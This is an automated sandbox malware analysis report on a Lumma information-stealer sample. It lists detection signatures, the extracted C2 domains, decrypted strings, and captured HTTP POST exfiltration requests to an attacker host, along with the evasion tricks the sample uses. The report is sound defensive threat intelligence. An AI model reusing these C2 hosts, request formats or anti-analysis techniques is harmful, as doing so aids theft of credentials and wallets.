Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1542964
MD5:89eb026b1e8b37df60728d38b5ba98ba
SHA1:20bef1ee48878b4b83d805f4b7d4c0b9b493f7d2
SHA256:7e903a309497439f4842b480e73d0b8c71a01cc597d3127c8869f093465c2317
Tags:exeuser-Bitsight
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6636 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 89EB026B1E8B37DF60728D38B5BA98BA)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["necklacedmny.store", "crisiwarny.store", "thumbystriw.store", "scriptyprefej.store", "fadehairucw.store", "presticitpo.store", "navygenerayk.store", "founpiuer.store"], "Build id": "4SD0y4--legendaryy"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000001.00000003.1367227452.0000000000B8F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000001.00000003.1312488858.0000000000B8E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000001.00000003.1335200391.0000000000B80000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000001.00000003.1364978590.0000000000B8E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000001.00000003.1348830892.0000000000B8E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 11 entries

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-27T01:22:10.970316+020020546531A Network Trojan was detected192.168.2.749700172.67.170.64443TCP
              2024-10-27T01:22:12.156140+020020546531A Network Trojan was detected192.168.2.749701172.67.170.64443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-27T01:22:10.970316+020020498361A Network Trojan was detected192.168.2.749700172.67.170.64443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-27T01:22:12.156140+020020498121A Network Trojan was detected192.168.2.749701172.67.170.64443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-27T01:22:15.939960+020020480941Malware Command and Control Activity Detected192.168.2.749703172.67.170.64443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: file.exeAvira: detected
              Found malware configuration
              Source: file.exe.6636.1.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["necklacedmny.store", "crisiwarny.store", "thumbystriw.store", "scriptyprefej.store", "fadehairucw.store", "presticitpo.store", "navygenerayk.store", "founpiuer.store"], "Build id": "4SD0y4--legendaryy"}
              Multi AV Scanner detection for submitted file
              Source: file.exeReversingLabs: Detection: 42%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for sample
              Source: file.exeJoe Sandbox ML: detected
              Sample uses string decryption to hide its real strings
              Source: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmpString decryptor: scriptyprefej.store
              Source: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmpString decryptor: navygenerayk.store
              Source: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmpString decryptor: founpiuer.store
              Source: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmpString decryptor: necklacedmny.store
              Source: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmpString decryptor: thumbystriw.store
              Source: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmpString decryptor: fadehairucw.store
              Source: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmpString decryptor: crisiwarny.store
              Source: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmpString decryptor: presticitpo.store
              Source: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmpString decryptor: presticitpo.store
              Source: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
              Source: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
              Source: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmpString decryptor: 4SD0y4--legendaryy
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0048D7F8 CryptUnprotectData,1_2_0048D7F8
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.7:49700 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.7:49701 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.7:49702 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.7:49703 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.7:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.7:49711 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.7:49722 version: TLS 1.2
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp ecx1_2_0048104F
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-42h]1_2_0047E1A0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp eax1_2_004AE210
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, dword ptr [esi+64h]1_2_004A15DC
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ecx, eax1_2_0049F9D0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov dword ptr [esi+10h], edx1_2_0049F9D0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [edi], cl1_2_0049F9D0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [edi], al1_2_0049F9D0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx+6D44C030h]1_2_0049AB20
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 9ABDB589h1_2_0049AB20
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h1_2_004B4C40
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+75E07B5Ch]1_2_0047EC20
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edi, esi1_2_004ABCA9
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-0000008Ah]1_2_0047CF90
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ebx, byte ptr [esi+ecx+38h]1_2_0048E07E
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov dword ptr [eax+ebx], 30303030h1_2_00471000
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov dword ptr [eax+ebx], 20202020h1_2_00471000
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, eax1_2_0049702F
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+edx]1_2_004AF020
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov esi, dword ptr [esp+1Ch]1_2_004AF020
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then add ecx, eax1_2_0049A083
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-6Ch]1_2_0049A083
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov esi, ecx1_2_004B2165
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ecx, dword ptr [004BDCFCh]1_2_004AC132
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], B62B8D10h1_2_0049D2FD
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ebx, dword ptr [esp]1_2_0049D2FD
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp ecx1_2_00498290
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+29352E8Dh]1_2_004B5330
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], B62B8D10h1_2_0049C3A6
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp ecx1_2_004814CE
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ebp, edx1_2_004B24E0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, dword ptr [esp+04h]1_2_004714A8
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+58h]1_2_00492520
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp ecx1_2_004B35F0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx eax, byte ptr [ebp+ecx-14h]1_2_004B35F0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h1_2_004966E0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ecx, byte ptr [esi+eax]1_2_004936AC
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp ecx1_2_004B3740
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx eax, byte ptr [ebp+ecx-14h]1_2_004B3740
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [eax], cl1_2_0049F73A
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ebx, byte ptr [esp+eax-3ED06EDAh]1_2_004AC7A0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]1_2_0049E7B0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then add edx, esi1_2_004998F2
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [eax], cl1_2_004A0887
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esi+ebx]1_2_00475890
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], cx1_2_00496940
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp ecx1_2_004B39C0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx eax, byte ptr [ebp+ecx-14h]1_2_004B39C0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx eax, byte ptr [ebp+ecx-14h]1_2_004B3A90
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then and esi, 001FF800h1_2_00474BA0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov dword ptr [esp+04h], ecx1_2_0048FBA0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp byte ptr [esi+eax], 00000000h1_2_0049ECE0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ebx, byte ptr [edx]1_2_004A8C80
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+6D44C02Ch]1_2_004AFC90
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [ebp+edx*4+00h], ax1_2_0047BD50
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+34h]1_2_0047BD50
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx eax, byte ptr [ebp+ecx-14h]1_2_004B3D90
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [edx], bp1_2_00491EC5
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [ecx], di1_2_00491EC5
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp edx1_2_00478EF0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [eax], cl1_2_004A0F3E

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49700 -> 172.67.170.64:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49700 -> 172.67.170.64:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49701 -> 172.67.170.64:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49701 -> 172.67.170.64:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49703 -> 172.67.170.64:443
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: necklacedmny.store
              Source: Malware configuration extractorURLs: crisiwarny.store
              Source: Malware configuration extractorURLs: thumbystriw.store
              Source: Malware configuration extractorURLs: scriptyprefej.store
              Source: Malware configuration extractorURLs: fadehairucw.store
              Source: Malware configuration extractorURLs: presticitpo.store
              Source: Malware configuration extractorURLs: navygenerayk.store
              Source: Malware configuration extractorURLs: founpiuer.store
              Source: Joe Sandbox ViewIP Address: 172.67.170.64 172.67.170.64
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: crisiwarny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: crisiwarny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12849Host: crisiwarny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15081Host: crisiwarny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20406Host: crisiwarny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1242Host: crisiwarny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 581658Host: crisiwarny.store
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: presticitpo.store
              Source: global trafficDNS traffic detected: DNS query: crisiwarny.store
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: crisiwarny.store
              Source: file.exe, 00000001.00000003.1349361584.000000000540D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: file.exe, 00000001.00000003.1349361584.000000000540D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: file.exe, 00000001.00000002.1447480635.0000000000B02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
              Source: file.exe, 00000001.00000003.1349361584.000000000540D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: file.exe, 00000001.00000003.1349361584.000000000540D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: file.exe, 00000001.00000003.1349361584.000000000540D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: file.exe, 00000001.00000003.1349361584.000000000540D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: file.exe, 00000001.00000003.1349361584.000000000540D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: file.exe, 00000001.00000003.1349361584.000000000540D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: file.exe, 00000001.00000003.1349361584.000000000540D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: file.exe, 00000001.00000003.1349361584.000000000540D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: file.exe, 00000001.00000003.1349361584.000000000540D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: file.exe, 00000001.00000003.1319650588.000000000531E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000001.00000003.1316164190.0000000005336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: file.exe, 00000001.00000003.1364448809.0000000005325000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
              Source: file.exe, 00000001.00000003.1364448809.0000000005325000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
              Source: file.exe, 00000001.00000003.1319650588.000000000531E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000001.00000003.1316164190.0000000005336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: file.exe, 00000001.00000003.1319650588.000000000531E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000001.00000003.1316164190.0000000005336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: file.exe, 00000001.00000003.1319650588.000000000531E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000001.00000003.1316164190.0000000005336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: file.exe, 00000001.00000003.1364448809.0000000005325000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
              Source: file.exe, 00000001.00000003.1364448809.0000000005325000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: file.exe, 00000001.00000002.1447480635.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1447480635.0000000000AEE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1447480635.0000000000AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1312761325.0000000000B8A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1447480635.0000000000B02000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1312424888.0000000000B7A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1433151385.0000000005301000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000001.00000002.1449178158.0000000005302000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/
              Source: file.exe, 00000001.00000002.1447480635.0000000000B02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/8
              Source: file.exe, 00000001.00000002.1447480635.0000000000AAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/L
              Source: file.exe, 00000001.00000002.1447480635.0000000000B02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/Y
              Source: file.exe, 00000001.00000002.1447480635.0000000000B02000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1335230711.0000000000B83000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1348810433.0000000000B83000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1348619405.0000000005305000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/api
              Source: file.exe, 00000001.00000002.1447839504.0000000000B9C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1388801349.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/api(w
              Source: file.exe, 00000001.00000002.1447480635.0000000000B02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/api7AG
              Source: file.exe, 00000001.00000002.1447480635.0000000000B02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/apiT
              Source: file.exe, 00000001.00000003.1364471802.0000000000B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/apibm
              Source: file.exe, 00000001.00000002.1447480635.0000000000B02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/apiq
              Source: file.exe, 00000001.00000003.1348738975.0000000005313000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000001.00000003.1349101168.0000000005313000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/j
              Source: file.exe, 00000001.00000002.1447480635.0000000000B02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/s
              Source: file.exe, 00000001.00000003.1319650588.000000000531E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000001.00000003.1316164190.0000000005336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: file.exe, 00000001.00000003.1319650588.000000000531E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000001.00000003.1316164190.0000000005336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: file.exe, 00000001.00000003.1319650588.000000000531E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000001.00000003.1316164190.0000000005336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: file.exe, 00000001.00000003.1364448809.0000000005325000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
              Source: file.exe, 00000001.00000003.1350763874.000000000562E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: file.exe, 00000001.00000003.1350763874.000000000562E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: file.exe, 00000001.00000003.1364448809.0000000005325000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
              Source: file.exe, 00000001.00000003.1319650588.000000000531E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000001.00000003.1316164190.0000000005336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: file.exe, 00000001.00000003.1319650588.000000000531E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000001.00000003.1316164190.0000000005336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: file.exe, 00000001.00000003.1364448809.0000000005325000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
              Source: file.exe, 00000001.00000003.1350763874.000000000562E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
